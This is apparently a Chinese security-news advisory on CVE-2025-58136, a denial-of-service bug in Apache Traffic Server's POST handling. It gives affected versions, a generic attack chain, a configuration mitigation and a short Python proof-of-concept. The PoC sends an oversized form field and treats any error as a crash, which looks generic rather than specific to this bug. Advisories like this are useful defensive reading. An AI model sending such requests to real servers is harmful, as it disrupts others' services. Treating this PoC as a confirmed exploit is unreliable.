CVE-2025-58136 CVSS 7.5 高危

CVE-2025-58136 Apache Traffic Server拒绝服务漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-58136

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Traffic Server

漏洞概述

Apache Traffic Server在处理POST请求时存在逻辑缺陷，导致特定条件下服务崩溃。该漏洞影响9.x和10.x多个版本，未经认证的攻击者可利用此漏洞远程造成服务不可用。

技术细节

该漏洞源于Apache Traffic Server处理POST请求时的一个Bug。攻击者无需身份认证（PR:N）和用户交互（UI:N），即可通过网络（AV:N）发送特制数据包触发漏洞。漏洞的根本原因在于请求处理逻辑未能正确处理特定条件，导致进程异常终止。虽然CVSS向量显示机密性（C:N）和完整性（I:N）未受影响，但可用性（A:H）受到严重影响。受影响版本包括9.0.0至9.2.12以及10.0.0至10.1.1。官方建议通过升级或配置修改来缓解风险。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别使用Apache Traffic Server的目标及其版本。

STEP 2

武器化

攻击者构造能够触发POST请求处理Bug的特制数据包。

STEP 3

投递

通过互联网向目标服务器发送恶意的POST请求。

STEP 4

利用

目标服务器处理该请求时触发逻辑错误，导致服务进程崩溃。

STEP 5

影响

Apache Traffic Server服务停止，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def trigger_poc(target_url):
    """
    PoC for CVE-2025-58136
    Attempts to trigger the crash via a crafted POST request.
    """
    try:
        # Sending a potentially malicious POST request
        payload = {'data': 'A' * 10000}
        response = requests.post(target_url, data=payload, timeout=5)
        print(f"Request sent. Status: {response.status_code}")
    except Exception as e:
        print(f"Potential crash detected: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080"
    trigger_poc(target)

影响范围

Apache Traffic Server 10.0.0 至 10.1.1

Apache Traffic Server 9.0.0 至 9.2.12

防御指南

临时缓解措施

对于无法立即升级的用户，建议将配置项 proxy.config.http.request_buffer_enabled 设置为 0（默认值），以缓解该漏洞带来的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表